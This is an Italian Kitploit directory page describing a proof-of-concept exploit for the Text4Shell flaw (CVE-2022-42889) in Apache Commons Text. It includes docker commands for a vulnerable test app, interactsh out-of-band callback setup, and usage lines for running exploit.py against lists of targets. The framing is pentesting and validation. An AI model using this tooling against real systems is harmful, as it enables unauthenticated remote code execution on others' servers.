Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
text4shell-exploit — CVE-2022-42889 - Text4Shell exploit | Kitploit
Strumenti/GitHubGitHub/gokul-ramesh/text4shell-exploit
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubgokul-ramesh/text4shell-exploit

text4shell-exploit

CVE-2022-42889 - Text4Shell exploit

Vedi Repository
133 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Text4shell-exploit

Questa è una Proof of Concept che sfrutta la vulnerabilità in Apache Commons Text [CVE-2022-42889]

Versioni vulnerabili : da 1.5.0 a (esclusa) 1.10.0

Impatto

Lo sfruttamento riuscito di questa vulnerabilità consente a un utente malintenzionato non autenticato di eseguire codice arbitrario sul sistema vulnerabile

Applicazione vulnerabile per verificare la PoC

Applicazione sviluppata da @securekomodo, allegata qui.

Docker

Questa applicazione può anche essere caricata dal docker-registry

root@kitploit:~
docker run -p 8080:8080 gokul2/text4shell-poc:latest

L'applicazione sarà ora disponibile su localhost:8080.

Validazione

Per verificare l'esecuzione arbitraria di comandi, utilizziamo interactsh, uno strumento per catturare interazioni OOB di @projectdiscovery.

Configurazione di Interactsh-client

Configura il client interactsh prima di eseguire l'exploit vero e proprio.

root@kitploit:~
docker run projectdiscovery/interactsh-client:latest

Prendi nota del dominio elencato dopo l'avvio dell'applicazione

root@kitploit:~
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro

Utilizzo

root@kitploit:~
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]

Verifica

Controlla i log nel client interactsh per convalidare l'exploit.

Scarica lo strumento